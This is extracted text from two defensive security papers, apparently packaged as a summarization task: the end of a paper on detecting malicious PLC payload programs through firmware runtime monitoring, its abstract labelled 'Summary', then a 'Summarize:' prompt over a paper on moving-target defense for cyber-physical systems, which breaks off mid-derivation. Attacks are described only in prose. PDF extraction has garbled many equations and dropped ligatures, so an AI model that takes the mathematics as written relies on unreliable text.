posed detection mechanism is acceptable, we create payload programs utilizing different numbers of I/Os and generating different numbers of network packets. Note that each of these payload programs generates two types of network events (i.e., 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 Number of analog outputs05001000150020002500300035004000Maximum execution time ( s)unmodified firmware modified firmware Fig. 8. Maximum execution time of PLC programs with different numbers of utilized analog outputs. All payload programs are executed on both unmodi ed and modi ed PLC rmware.2018 IEEE Conference on Communications and Network Security (CNS) Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:41 UTC from IEEE Xplore. Restrictions apply. Medium- or High-Voltage Bus Voltage and Current Sensors Circuit Breaker (CB) Primary Transformer Load 1Load 2Load 3Primary Transformer Protection PLC Feeder #1 Protection PLCFeeder #2 Protection PLCFeeder #3 Protection PLCPLC AFig. 9. Sample power substation protection system implemented by multiple PLCs. Note that our PLC prototype only emulates PLC A. sending two packets or receiving one packet within each pro- gram scan cycle) and utilizes 16 digital I/Os. The number of analog outputs utilized by these payload programs varies from 0 to 16. Each analog output has two legitimate value ranges. The timing relationships in the control system speci cations all describe preconditions for analog outputs. These payload programs are then loaded onto our PLC prototype twice: First, unmodi ed PLC rmware is used to execute the payload programs and the maximum sizes of the PLC rmware in the RAM are logged. Then, PLC rmware with our payload detection mechanism is used and the maximum rmware sizes are also recorded. Fig. 7 shows the memory overhead of implementing our PLC payload attack detection method in our PLC prototype. For a PLC system with 16 analog outputs, the memory overhead (compared to unmodi ed PLC rmware) is about 1 kB, which translates to a 3% increase in memory size. This memory overhead is acceptable for existing PLC systems on the market, which typically have more than 32 kB of memory [9]. B. Execution Time Overhead PLC payload program needs to satisfy execution time requirements in order to control physical process correctly. If a program scan cycle takes too long to complete, the PLC will not be able to track the changes of the physical process and generate control outputs timely. Since our payload detec- tion mechanism incorporates runtime behavior monitoring and validations in the PLC rmware, it is necessary the ensure that execution time of the program scan cycle does not signi cantly increase. TABLE II. A TTACK INSTANCES IMPLEMENTED ON PLC P ROTOTYPE Attack Instance Group Description Illegitimate analog in- puts (Group 1, 5 in- stances)Scaling factors of analog input modules are modi ed by attacker(s) to generate out-of-range input values. Illegitimate network events (Group 2, 5 instances)When trip coils are energized, the attack payload sends process data to multiple pre-speci ed destina- tions. When process data request is received, a packet containing intentionally modi ed process data is sent. Illegitimate I/O event timing (Group 3, 5 in- stances)Trip coils are not energized within 1000 s when a voltage/current fault is detected. Illegitimate network event timing (Group 4, 5 instances)Packet containing up-to-date process data is not sent within 500 s after process data request is received.TABLE III. A TTACK INSTANCES AND DETECTION RESULTS Group/ID 1 2 3 4 5 6 7 8 9 10 1/1 XXXXXXXXXX 1/2 XXXXXXXXXX 1/3 XXXXXXXXXX 1/4 XXXXXXXXXX 1/5 XXXXXXXXXX 2/1 XXXXXXXXXX 2/2 XXXXXX 2/3 XXXXXXXXXX 2/4 XXXXXXXXXX 2/5 XXXXXXXXXX 3/1 XXXXXXXXXX 3/2 XXXXXXXXXX 3/3 XXXXXXXXXX 3/4 XXXXXXXXXX 3/5 XXXXXXXXXX 4/1 XXXXXXXXXX 4/2 XXXXXXXXXX 4/3 XXXXXXXXXX 4/4 XXXXXXXXXX 4/5 XXXXXXXXXX To evaluate the execution time overhead of the proposed detection mechanism, we measure the execution time of the payload program instances created in Sec. V-A. Each payload program are executed for 1,000 program scan cycles on both unmodi ed and modi ed PLC rmware. Note that we added six extra assembly instructions in the PLC rmware to set up an extra output pin of the prototype PLC: At the beginning of each program scan cycle, this pin is set to HIGH. At the end of each program scan cycle, this pin is set to LOW. Fig. 8 shows the maximum execution time of the payload program instances. The average increase in maximum execution time is about 65 s, which is far above the typical execution time of PLC payload programs (e.g., 110 ms [9]). C. Detection Performance To evaluate the detection performance of our proposed method, our PLC prototype emulates PLC A shown in Fig. 9. To implement the protection tasks assumed by PLC A, four analog inputs and two digital outputs are utilized. Our control system speci cations require that both circuit breakers are tripped within 1000 s once a voltage/current fault is detected on either side of the transformer. In addition, when process data request (sent by a PC emulating an HMI) is received, a packet containing up-to-date current and voltage readings must be sent within 500 s. We create 20 different payload attack instances, which can be categorized into the four groups and are described in Table II. Each payload attack instance is executed for 10 times (each run consisting of 1,000 program scan cycles). Table III shows the detection results when running the payload attacks on the modi ed PLC rmware. 19 out of the 20 payload attack instances can always be detected during our evaluation, which shows that our proposed detection mechanism can help prevent PLC payload attacks without introducing external apparatus. One of the attack instances (Group 2, Instance 2) cannot always be detected. This attack instance either generates ille- gitimate outputs or transmits modi ed process data as network packets. When it sends network packets, it simply modi es the process data values stored in memory before they are encapsulated. The preconditions of network events are still2018 IEEE Conference on Communications and Network Security (CNS) Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:41 UTC from IEEE Xplore. Restrictions apply. met and the timing relationships are not violated. Although this attack instance can sometimes evade our detection, it can be easily identi ed by existing detection methods against false data injection attacks [23]. VI. D ISCUSSION In this paper, we propose incorporating runtime behavior monitoring and establishing runtime behavior models from control system speci cations to detect PLC payload attacks. Although our evaluations show that it is feasible to implement our proposed method in existing PLC rmware and achieve good detection performance, we note that further enhance- ments to the proposed method are possible. For instance, it is possible to encode correlations between I/O events at certain time instants during the program scan cycle (e.g., by iden- tifying legitimate I/O combinations in the runtime behavior model). However, such an enhancement will require overly de- tailed control system speci cations. Control system engineers may not be aware of all the legitimate I/O combinations when creating the PLC payload program. Furthermore, the memory and execution time overhead of such an enhancement will also increase. Therefore, it remains to be further evaluated whether other runtime behavior speci cations should be included in our model. Our current implementation focuses on payload attack detection instead of mitigation. Although output and network packets related to abnormal control logic are blocked, the operations of the ICS may still be affected. As our future work, we will devise better mitigation strategies for ICS with different mitigation resources. VII. C ONCLUSION In this paper, we propose the detection of PLC payload attacks via runtime behavior monitoring in PLC rmware. Through modeling and monitoring the runtime behaviors, our proposed rmware enhancements can detect abnormal runtime behaviors of malicious payload. Using our proof-of-concept PLC prototype, we show that the proposed approach can identify a wide variety of PLC payload attacks revealed by prior research. In addition, our evaluations show that the ex- ecution time and memory overhead of the proposed detection mechanism are acceptable for existing PLC rmware. Our proposed approach complements existing bump-in-the-wire solutions in that it can detect payload attacks that violate real- time requirements of ICS operations. ACKNOWLEDGMENT This work is supported by the U.S. Department of Energy (DoE) under Award Number DE-OE0000779.
Summary:
Programmable logic controllers (PLCs) play criti- cal roles in industrial control systems (ICS). Providing hardware peripherals and rmware support for control programs (i.e., a PLC s payload ) written in languages such as ladder logic, PLCs directly receive sensor readings and control ICS physical processes. An attacker with access to PLC development software (e.g., by compromising an engineering workstation) can modify the payload program and cause severe physical damages to the ICS. To protect critical ICS infrastructure, we propose to model runtime behaviors of legitimate PLC payload program and use runtime behavior monitoring in PLC rmware to detect payload attacks. By monitoring the I/O access patterns, network access patterns, as well as payload program timing characteristics, our proposed rmware-level detection mechanism can detect abnormal runtime behaviors of malicious PLC payload. Using our proof-of-concept implementation, we evaluate the memory and execution time overhead of implementing our proposed method and nd that it is feasible to incorporate our method into existing PLC rmware. In addition, our evaluation results show that a wide variety of payload attacks can be effectively detected by our proposed approach. The proposed rmware-level payload attack detection scheme complements existing bump- in-the-wire solutions (e.g., external temporal-logic-based model checkers) in that it can detect payload attacks that violate real- time requirements of ICS operations and does not require any additional apparatus.
|
Summarize:
Index Terms Cyber-physical systems (CPSs), entropy, moving target and proactive defense, reactive defense, security. I. I NTRODUCTION CYBER-PHYSICAL systems (CPSs) are complex plat- forms comprised of a physical layer, containing sensing and actuating devices, as well as communication and compu- tational layers [1]. Such systems can be found in a number of areas ranging from military to civilian applications, namely healthcare and medicine [2], smart grids [3], [4], and trans- portation [5]. Due to the complex, and often large-scale nature of CPS, there is a plethora of attack angles that can be exploited by potential malicious agents/components. Numerous attacks Manuscript received October 25, 2018; revised March 19, 2019; ac- cepted April 28, 2019. Date of publication May 9, 2019; date of current version February 27, 2020. This work was supported in part by ONR Minerva under Grant N00014-18-1-2160, in part by the NSF CAREER under Grant CPS-1851588, in part by the Army Research Of ce (ARO) under Grant W911NF-19-1-0270, and in part by the Department of En- ergy under Grant DE-EE0008453. Recommended by Associate Editor P r o f .H .L i n . (Corresponding author: Aris Kanellopoulos.) The authors are with the Daniel Guggenheim School of Aerospace Engineering, Georgia Institute of T echnology, Atlanta, GA 30332 USA (e-mail: ,ariskan@gatech.edu; kyriakos@gatech.edu). Color versions of one or more of the gures in this paper are available online at http://ieeexplore.ieee.org. Digital Object Identi er 10.1109/T AC.2019.2915746on CPS have been reported, e.g., the Stuxnet virus, a malicious computer worm targeting programmable logic controllers [6] or the attack on the Maroochy water services in Australia [7]. Also, more complex attacks have been reported, e.g., the simultaneous communication jamming and GPS spoo ng of a military U.S. drone [8]. In order to ensure the integration of CPS in our soci- ety, there is a need for robust defense mechanisms to counteract such malicious attacks. Moving target defense (MTD) [9] is a defense paradigm, which aims to minimize the inherent advantage the attacker has, over the defender. While the security measures employed by the system s defender have to monitor all the vulnerable com- ponents at all times and mitigate against all kinds of attack ap- proaches, the attacker herself may need to bypass those defenses only once. Moreover, most CPS operate statically with respect to their structure, goals, and constraints. Such vulnerabilities, offer to a persistent attacker the necessary time to exploit the system and develop appropriate strategies. MTD protocols aim to tackle this asymmetry by developing mechanisms that con- tinually and unpredictably change the parameters of the system. Such unpredictability has three goals: to increase the cost of attacking; to limit the exposure of vulnerable components; and to deceit the opponent. A. Related Work The work in [10] questions the adequacy of the security ap- proaches that operate only in the computational layer, such as encryption algorithms. Therefore, extensive research has been conducted on the behavior and security of complex CPS from a control-theoretic standpoint [11] [13]. Furthermore, by lever- aging models that are common in control theory, such as dynam- ical systems, we are able to better exploit the interconnection between the input and the output of a given system, which is often leveraged in CPS attacks. This has been addressed in [14] and is a valuable tool in defending against attacks such as in drone spoo ng. Among the different design approaches, optimal control, and game theory [15] have emerged as important frameworks due to their abilities to satisfy user-de ned performances in the pres- ence of cooperating and noncooperating agents. Mathemati- cally, optimal feedback policies are computed by solving the socalled Hamilton Jacobi Bellman (HJB) equation. In [16], se- curity problems are formulated as zero-sum games between at- tacking and defending agents. In [17], a graphical game is solved on a complex multiagent network under persistent adversaries. 0018-9286 2019 IEEE. Personal use is permitted, but republication/redistribution requires IEEE permission. See https://www.ieee.org/publications/rights/index.html for more information. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:13 UTC from IEEE Xplore. Restrictions apply. 1030 IEEE T RANSACTIONS ON AUTOMATIC CONTROL, VOL. 65, NO. 3, MARCH 2020 These approaches seek to mitigate the attacker s in uence rather than dissuade her from attacking. Theodorakopoulos and Baras [18] de ned trust metrics to analyze the interconnections be- tween the agents of a network. The research on MTD has mostly focused on its applica- tion to computer networks [19] [21]. In [22], the authors apply the principles of MTD to constantly rotating Internet Proto- col version 6 addresses. In [23], a proactive defense strategy was formulated to deceit an attacker targeting nodes in a wire- less network. In the context of CPS, those approaches can be employed in the computational and communication layers of the system. In this paper, we leverage control-theoretic tools to achieve a system-wide proactive and reactive defense that, to the best of our knowledge, has not been addressed before. A more formalized approach to MTD was introduced in [24], leading to an MTD entropy hypothesis framework that is generally ap- plicable. In [25], a multilayer zero-sum game was formulated between an attacker trying to maximize the damage to the sys- tem, and a defender randomizing over different con gurations of the system, without considering the continuous-time dynam- ics due to the physics of the system. An MTD approach was used to enlarge the dimension of the state space in [26] for the purposes of attack detection, rather than proactive defense based on an unpredictability measure. V amvoudakis et al. [27] focused on the estimation problem of a binary variable in a network of sensors under Byzantine attacks, with no consideration of the system s dynamics. Fawzi et al. [28] showed that if the attacker is able to compromise less than half of the sensors, it is always possible to recover the state information. In order to relax this assumption, several switching-based schemes have been developed that, rather than guaranteeing robustness of estimation or operation under attack, they opt to identify the attacked components and take them of- ine. Following this line of research, an attack detection lter and a passivity-based switching mechanism were introduced in [29] and [30], where explicit knowledge of the dynamics was required for the detection mechanism, and the switching struc- ture was utilized in a reactive fashion, without the advantages offered by a proactive MTD mechanism. 1) Contribution: The contributions of this paper are four- fold. First, we model the attacker s effect as a time-varying and unknown, but integrable degradation parameter. Then, multi- ple controllers and observers are designed for every admissible combination of actuators and sensors. Third, we use a proba- bilistic switching rule based on the entropy hypothesis to design a structure that offers proactive defense properties to the sys- tem. Moreover, we propose a performance evaluator based on the integral Bellman error of the closed-loop system to detect compromised actuators and sensors, and remove them from the switching queue. Finally, we show that the system under unpre- dictable switching, of either the actuating or the sensing com- ponents, has an asymptotically stable equilibrium point with a quanti ed dwell time and the performance and we present sim- ulation results that highlight the operation of our approach as well as the tradeoff between optimality and security. 2) Structure: The remainder of this paper is structured as follows. Section II formulates the problem of defending a CPSfrom actuator and sensor attacks while also increasing the attack- ing surface to enhance uncertainty and unpredictability. In Sec- tion III, we focus on proactive and reactive defense against actu- ator attacks. Section IV extends the framework of Section III, to incorporate a proactive and reactive defense framework against sensor attacks. Simulation results are shown in Section V. Fi- nally, Section VI concludes and discusses future work. 3) Notation: The notation used here is standard. (A)is the maximum eigenvalue of the matrix Aand (A)is its minimum eigenvalue. /bardbl /bardbl denotes the Euclidean norm of a vector and the Frobenius norm of a matrix. The superscript is used to denote the optimal trajectories of a variable. ( )Tdenotes the transpose of a matrix. xand xare used interchangeably and denote the partial derivative with respect to a vector x. The cardinality of a set, i.e., the number of elements contained in the set, is denoted by card ( ).2Adenotes the power set of a set A, i.e., the set containing all the subsets of A, including the empty set and A itself. Finally, supp (x)denotes the support of a vector, i.e., the number of its nonzero elements. II. P ROBLEM FORMULA TION Consider the following linear time-invariant continuous-time system x(t)=Ax(t)+Bua(t),t/greaterorequalslant0 y(t)=Ca(t)x(t) (1) where x(t) Rnis the state, ua(t) Rmis the potentially attacked input of the system, y(t) Rpis the output, A Rn n is the plant matrix, B Rn mis the input matrix, and Ca(t) Rp nis the potentially attacked output matrix. We can rewrite (1) as x(t)=Ax(t)+m/summationdisplay i=1biui(t) yj(t)=cj(t)x(t),j {1,...,p } where biis a column vector corresponding to the ith actuator, uiis the value of the input signal associated with this actuator, andyjis the output given by a speci c sensor cjcorresponding to the jth row of the output matrix. The potentially compromised control input of (1) will be of the following form ua(t)= (t)u(t),t/greaterorequalslant0 (2) where (t)= diag ( ii(t)), i {1,...,m }is a time-varying actuator attack parameter controlled by an adversary and u(t) Rmis the nonattacked control input. The output matrix of the system can be undermined by a signal s(t)as Ca(t)= s(t)C, t/greaterorequalslant0 (3) where s(t)is a diagonal matrix controlled by the attacker and C Rp nis the nonattacked output matrix. Remark 1: Note that the focus of this paper is on the compo- nents of the CPS that can be modeled utilizing control theoretic techniques. Although there are attack angles that can affect the Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:13 UTC from IEEE Xplore. Restrictions apply. KANELLOPOULOS AND VAMVOUDAKIS: A MOVING T ARGET DEFENSE CONTROL FRAMEWORK FOR CYBER-PHYSICAL SYSTEMS 1031 software, which implements the proposed intrusion detection algorithms, those lie beyond the scope of our research. It is assumed that the computing elements are equipped with appro- priate security measures, such as encryption mechanisms [31]. On the other hand, our approach considers attacks that leverage the dual nature of CPS, hence, we develop methods that take into account the cyber components that interact with the physics of the systems, i.e., sensors and actuators. /square Assumption 1: In order to offer a greater degree of freedom for deception purposes and to mitigate the effect of potential attacks, we will consider systems with redundant actuating and sensing components. /square Assumption 2: We will assume that the system s actuators are not compromised over a time interval [t1,t2]if and only if ii( )=1 , i {1,...,m }, . Similarly, we consider the sensors as secure, if and only if s jj( )=1 , j {1,...,p } . The signals (2) and (3) are assumed to be locally integrable over any closed time interval [t1,t2],0/lessorequalslantt1<t 2. /square Remark 2: The assumption on the local integrability of the adversarial signals allows us to take into account a variety of realistic attack scenarios, such as impulses and other discon- tinuous signals, or constant bias injection, which is locally, but not globally, integrable. The underlying restriction on the signal excludes attacks that have in nite value on a speci c time interval, which is a practical assumption on the adversarial capabilities. /square Assumption 3: We will assume that the attacker is not able to compromise all of the actuators and sensors at once. Therefore, supp ( )<m and supp ( s)<p. /square Remark 3: It should be noted that our formulation will make no assumptions on the structure, boundedness, and other Lips- chitz continuity properties of the attacker s signal. Furthermore, attacks of the form (2) and (3), due to their time-varying nature, can describe a wide range of attacks, including additive and multiplicative attacks. /square We are, thus, interested in designing a proactive and a reactive defense mechanism that will operate well in the absence of at- tackers, and will detect and mitigate attacks while guaranteeing closed-loop stability of the equilibrium point. III. D EFENSE AGAINST ACTUA TOR ATT ACKS We will initially focus our attention to the case of actuator attacks. We note that throughout this section, full state feedback is assumed. Let Bdenote the set containing the actuators of (1) by the vectors bi,i {1,...,m }. The power set of B, denoted as2B, contains all possible combinations of the actuators acting on (1). Each of these combinations is expressed by the input matrix Bj,j {1,..., 2m}whose columns are the appropriate vectors bi. The set of the candidate actuating modes Bcis de ned as the set of the actuator combinations that renders system (1) fully controllable, i.e., Bc=/braceleftbig Bj 2B:rank (/bracketleftbig BjABj An 1Bj/bracketrightbig )=n/bracerightbig .(4) System (1) assuming full state-feedback, with the actuating modeBican be rewritten as x=Ax+Biui,i {1,..., card (Bc)},t/greaterorequalslant0. (5)Remark 4: Note that, we do not require different actuating modes to share common actuators. Moreover, while a single actuating mechanism might be able to control a system, two different less potent mechanisms might need to work co- operatively to control the same system. All these modes will belong to the set described in (4). /square A. Optimal Controllers Design For each actuating operating mode Bi,i {1,..., card (Bc)}, we denote the candidate control law asui(t). We are interested in deriving optimal controllers for each of these modes by utilizing well-known optimal control approaches [32]. Toward that, we are interested in solving the following optimization: V i(x(t0)) = min ui/integraldisplay t0ri(x,ui)d min ui/integraldisplay t0(xTQix+uT iRiui)d , x(t0)(6) given (5), where Qi/followsequal0,Ri/follows0, i {1,..., card (Bc)}. Assumption 4: We assume that each pair (A, Qi)is detectable. /square The Hamiltonian associated with (5) and (6) is Hi(x,ui, Vi)= VT i(Ax+Biui) +xTQix+uT iRiui, x,ui withVidenoting the value function, not necessarily the optimal. Applying the stationarity conditions Hi(x,ui, Vi) ui=0 yields ui= R 1 iBT i Vi. (7) The optimal value functions V i( )must satisfy the following HJB equation xTQix+ V T iAx 1 2 V T iBiR 1 iBT i V i=0. (8) Since all the systems described by (5) are linear and the cost given by (6) is quadratic, all the value functions will be quadratic in the state x, i.e.,V i(x)=xTPix, P i/follows0. Substituting this expression into (8) and the resulting optimal value function into (7) yields the feedback controller with optimal gain Ki u i(x)= Kix:= R 1 iBT iPix, x where Piare the solutions to the following Riccati equations ATPi+PiA PiBT iR 1 iBT iPi+Qi=0. (9) We introduce Kthe set containing all Ki,i {1,...,m }, with the understanding that card (K)= card (Bc). For the ease of exposition, with some abuse of notation, we will consider Kito mean the optimal controller with this gain as well as its corresponding index. Fact 1: Due to (4) and Assumption 4, for each Bi,t h es o l u - tion exists and is unique. /square Fact 2: EachKi, with input given by (7) guarantees that (1) has an asymptotically stable equilibrium point. /square Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:13 UTC from IEEE Xplore. Restrictions apply. 1032 IEEE T RANSACTIONS ON AUTOMATIC CONTROL, VOL. 65, NO. 3, MARCH 2020 B. Switching-Based MTD Framework We will now develop a framework to facilitate the deception of potential attackers based on the principles of MTD. 1) Maximization of Unpredictability: To formally de ne the switching law, we need to introduce a probability simplex p, which denotes the probability that each controller Kiis active. To incorporate ideas from the framework of MTD, we propose a switching rule that optimizes over the minimum cost that each controller is able to attain, as well as an unpredictability term quanti ed by the information entropy produced by the switching probability simplex p. This way, we will achieve the desired tradeoff between overall optimality and unpredictability. The use of the information entropy is a standard practice in MTD design [33]. Theorem 1: Suppose that (1) is controlled by N=card (K) candidate controllers with an associated cost given by (6). Then, the probability pithat each controller Kiis active is given by pi=e/parenleftBigg V i /epsilon1 1 /epsilon1log/parenleftBigg e 1/summationtextN i=1eV i/epsilon1/parenrightBigg/parenrightBigg (10) with/epsilon1 R+denoting the weight on unpredictability during the optimization process. Proof: We formulate the following optimization problem: min p/parenleftbig V Tp /epsilon1H(p)/parenrightbig subject to: /bardblp/bardbl1=1 and p/followsequal0 where V := [V 1 V N]T=[x(t0)TP1x(t0) x(t0)T PNx(t0)]Tdenotes a column vector containing the value function of each candidate controller and H(p)= pTlog(p) is the information entropy produced by the simplex. Remark 5: The choice of this particular objective function allows us to combine the two required speci cations. The linear term V Tppenalizes the deviations from the overall optimal controller, while the entropy term H(p)penalizes the use of a single controller throughout the operation of the system. The result is a compromise that is speci ed by the optimization weight /epsilon1. /square Furthermore, for the decision vector pto constitute a proba- bility simplex, we constrain it to the nonnegative orthant (i.e., pi/greaterorequalslant0, i {1,...,N }) and we require its l1norm to satisfy, /bardblp/bardbl1=/summationtextN i=1/bardblpi/bardbl=1. The entropy of a probability is a concave function [34], and therefore, the cost index, being a sum of a linear function of the probability and the negative entropy, is convex. Thus, we can de ne the Lagrangian of the optimization problem as L =V Tp /epsilon1H(p)+ (1Tp 1) + Tp =V Tp+/epsilon1pTlog( p)+ (1Tp 1) + Tp where 1denotes a vector consisting of ones and , are the Karush Kuhn Tucker (KKT) multipliers. The KKT conditions for the problem are pL=V +/epsilon11+/epsilon1log( p)+ 1+ and the complementarity conditions for the optimal solution p are Tp =0. If there exists an ifor which pi=0, then the term log(pi) will be unde ned. Consequently, for the optimization problem to be feasible, one of the following two conditions need to hold: 1)/epsilon1log(pi)=0, i /epsilon1=0 p = [0i 1,..., 1,..., 0N i]Twhere the Kicontroller is the one with an overall less cost; and 2) =0. Consider now the nontrivial case, i.e., =0, which yields pL=V +/epsilon1log( p)+/epsilon11+ 1=0. TheNequations for each controller are independent, leading to the following system of equations: V i+/epsilon1log(pi)+/epsilon1+ =0, i {1,...,N }. Solving now for the optimal probabilities piyields pi=e/parenleftbigg V i /epsilon1 /epsilon1 1/parenrightbigg , i {1,...,N }. (11) Taking into account that /bardblp/bardbl1=1 N/summationdisplay i=1pi=1 N/summationdisplay i=1e/parenleftbigg V i /epsilon1 /epsilon1 1/parenrightbigg =1 and solving for yields =/epsilon1log/parenleftBigg e 1N/summationdisplay i=1e/parenleftbigg V i /epsilon1/parenrightbigg/parenrightBigg . (12) Substituting (12) in (11) provides the required result. /squaresolid 2) Switching-Based MTD Scheme: In order to analyze the behavior of the system under the proposed MTD framework, we shall formulate a switched system consisting of the different operating modes. First, we introduce the switching signal (t)=i,i {1,..., card (K)}, which denotes the active controller as a func- tion of time. This way, the system is x(t)= A (t)x(t) (13) where A (t):=A B (t)R 1 (t)BT (t)P (t)denotes the closed- loop subsystem with the controller K (t)active. Remark 6: Since the actual switching sequence is different under the designer s choice for unpredictability, we will con- strain the switching signal to have a prede ned average dwell time. This way, the stability of the overall system will be in- dependent of the result of the optimization. Intuitively, as was initial shown in [35], a system with stable subsystems is stable if the switching is slow enough on an average sense. /square De nition 1: A switching signal has an average dwell time Dif over any time-interval [t,T],T/greaterorequalslantt, the number of switches S(T,t)is bounded above as S(T,t)/lessorequalslantS0+T t D Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:13 UTC from IEEE Xplore. Restrictions apply. KANELLOPOULOS AND VAMVOUDAKIS: A MOVING T ARGET DEFENSE CONTROL FRAMEWORK FOR CYBER-PHYSICAL SYSTEMS 1033 where S0is an arbitrary chatter bound and Dis the dwell time. /square Theorem 2: Consider system (1) in the absence of attacks. The switched system de ned by the piecewise continuous switching signal (t)=i,i {1,..., card (K)}, with active controller Kigiven by (7) and continuous ow given by (5) has an asymptotically stable equilibrium point for every switch- ing signal (t)if the average dwell time is bounded by D>log/parenleftbig max q,p {1,..., card (K)} (Pp) (Pq)/parenrightbig minp {1,..., card (K)} (Qp+PpBpR 1pBTpPp) (Pp)(14) with an arbitrary chatter bound S0>0. Proof: For each i {1,..., card (K)}following [36], we choose the Lyapunov function for each subsystem Vi(x)=xTPix, x where Piis the solution to the Riccati equation (9). The Lya- punov functions are positive de nite and radially unbounded x. According to the Rayleigh Ritz inequality for symmetric ma- trices, one has (Pi)/bardblx/bardbl2/lessorequalslantxTPix=Vi(x)/lessorequalslant (Pi)/bardblx/bardbl2. (15) The time derivative of Vi(x)along the solutions of the trajec- tory of the corresponding subsystem is Vi(x)= xTPix+xTPi x =xT(A BiR 1 iBT iPi)TPix +xP(A BiR 1 iBT iPi)x =xT(ATPi PiBiR 1 iBT iPi +PiA PiBiR 1 iBT iPi)x. Taking into account (9) and denoting Hi:=Qi+ PiBiR 1 iBT iPi/follows0, i {1,..., card (K)}yield Vi(x)= xT Hix. Consequently, it holds that Vi(x)/lessorequalslant ( Hi)/bardblx/bardbl2. (16) Combining now (16) with (15) and noting that (Pi)/bardblx/bardbl2/lessorequalslant Vi(x) /bardblx/bardbl2/lessorequalslant1 (Pi)Vi(x)yield Vi(x)/lessorequalslant ( Hi) (Pi)Vi(x). (17) For the inequality to hold for arbitrary modes, we have Vi(x)/lessorequalslant min i {1,..., card (K)} ( Hi) (Pi)Vi(x). Following similar arguments, we show that it holds p,q {1,..., card (K)} Vp(x)/lessorequalslant (Pp) (Pq)Vq(x).For the inequality to hold for arbitrary pairs of modes, we further write Vp(x)/lessorequalslant max p,q {1,..., card (K)} (Pp) (Pq)Vq(x). For ease of exposition, we denote := min i {1,..., card (K)} ( Hi) (Pi)and := max p,q {1,..., card (K)} (Pp) (Pq). Without loss of gen- erality, we will consider that the switched system is evolv- ing on the time interval [0,tf]. Denote as S(tf,0), the num- ber of switches over this interval, which takes place at times ti,i [0,S(tf,0)] withti<ti+1. The active mode will be the same over any interval [ti,ti+1], i.e., the switching signal (t)=iis piecewise constant. De ne the function W(t)=e tV (t)(x(t)). (18) Along the solutions of the switched system (13) over an in- terval t [ti,ti+1], the time derivative of (18) is W= W +e t V (t)(x(t)) which is nonpositive due to (17). Consequently, the function W(t)is a nonincreasing function t [ti,ti+1]. At the jump instances tione has W(ti+1)=e ti+1V (ti+1)(x(ti+1)) /lessorequalslant e ti+1V (ti+1)(x(ti+1)) W(ti+1)/lessorequalslant e tiV (ti)(x(ti)) = W (ti) (19) where we used the nonincreasing property of W(t). Over the whole interval [0,tf], by iterating (19) over the S(0,tf) 1discontinuities yields W(tf )/lessorequalslant S[0,tf]W(0) e tfV (tf )(x(tf))/lessorequalslant S[0,tf]e 0V (0)(x(0)) e tfV (tf )(x(tf))/lessorequalslant S[0,tf]V (0)(x(0)). (20) We can rewrite now (20) as V (tf )(x(tf))/lessorequalslanteS0log e/parenleftBig log D /parenrightBig tfV (0)(x(0)). It is clear that choosing Din a way that satis es the bound (14), the exponential terms are such that V (tf )(x(tf)) 0as tf . Due to (15), we can conclude that x(tf) 0, which is the required result. /squaresolid C. Integral Bellman-Based Intrusion Detection Mechanism In this section, an intrusion detection mechanism is designed to identify the potentially corrupted sets of controllers that be- long to the set K. The attack detection signal will rely on the optimality property as well as on data measured along the possibly corrupted trajectories of the system. Based on a sam- pling mechanism, we denote the measurements of the state at the sampling instances as xc(t)and de ne the functions Vi( ): =xT cPixc,i {1,..., card (K)}. Intuitively, we obtain Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:13 UTC from IEEE Xplore. Restrictions apply. 1034 IEEE T RANSACTIONS ON AUTOMATIC CONTROL, VOL. 65, NO. 3, MARCH 2020 a sampled version of the optimal value function along the sys- tem s real, and potentially compromised, trajectories. Lemma 1: The error between the optimal trajectory and the real (potentially attacked) trajectory under the integrable attack signal (t)over a closed time interval [t0,t1]is bounded as /bardblex(t)/bardbl/lessorequalslant i(t, )/bardblx(t0)/bardbl where i(t, )=/integraldisplayt t0 i( )/bardblI (t)/bardble/integraltextt t0 i( )/bardblI ( )/bardbld d and i( )=/bardble(A BiKi)( t0)/bardbl/bardblBi/bardbl/bardblKi/bardbl withKi=R 1 iBT iPi. Proof: For ease of exposition, we denote the time interval under consideration as [t0,t1].L e tx (t)be the trajectory of the system driven by (7) under the absence of attacks, and by xc(t)the actual possibly compromised trajectory. Also we assume, without loss of generality, that t/lessorequalslantt0there is no attack on the system, therefore, the optimal trajectory of the system coincides with the actual trajectory x (t0)=xc(t0)=x(t0). The optimal and actual trajectories evolve according to x (t)=(A BiKi)x (t),x (t0)=x(t0) xc(t)=(A Bi (t)Ki)xc(t),xc(t0)=x(t0). Since we take into account attack signals that may be inte- grable but discontinuous, the trajectories xc(t)are de ned in the sense of Carath eodory. First, we consider the actual trajectory of the system xc(t), t [t0,t1]according to xc=(A Bi Ki)xc,xc(t0)=x(t0) xc=(A BiKi)xc+(Bi(I )Ki)xc. (21) The solution to (21), with (Bi(I )Ki)xctaken as a forcing term is xc(t)=e(A BiKi)(t t0)xc(t0) +/integraldisplayt t0e(A BiKi)(t )Bi(I ( ))Kixc( )d . Taking norms yields /bardblxc(t)/bardbl/lessorequalslant/bardble(A BiKi)(t t0)/bardbl/bardblx(t0)/bardbl +/integraldisplayt t0/bardble(A BiKi)(t )/bardbl/bardblBi/bardbl/bardbl(I ( ))/bardbl/bardblKi/bardbl)/bardblxc( )/bardbld . Since each controller Kirenders the system stable, we know that the transition matrix of the closed-loop sys- tem will be upper bounded. Therefore, we can intro- duce i= max t/bardble(A BiKi)(t t0)/bardbl. By denoting as i( )= /bardble(A BiKi)( t0)/bardbl/bardblBi/bardbl/bardblKi/bardbl, will have /bardblxc(t)/bardbl/lessorequalslant i/bardblx0/bardbl+/integraldisplayt t0 i( )/bardblI ( )/bardbl/bardblxc( )/bardbld . It has been shown in [37] that under assumptions of integrabil- ity, Gronwall-type inequalities hold for discontinuous functionsinside the integral, such as ( )/bardblI ( )/bardbl. Applying these re- sults yields a bound on the norm of the actual trajectory /bardblxc(t)/bardbl/lessorequalslant i/bardblx(t0)/bardble/integraltextt t0 i( )/bardblI ( )/bardbld . (22) We can now de ne the error between the actual and the opti- mal trajectory as ex(t)=xc(t) x (t) (23) with dynamics given by ex= xc x =(A Bi Ki)xc (A 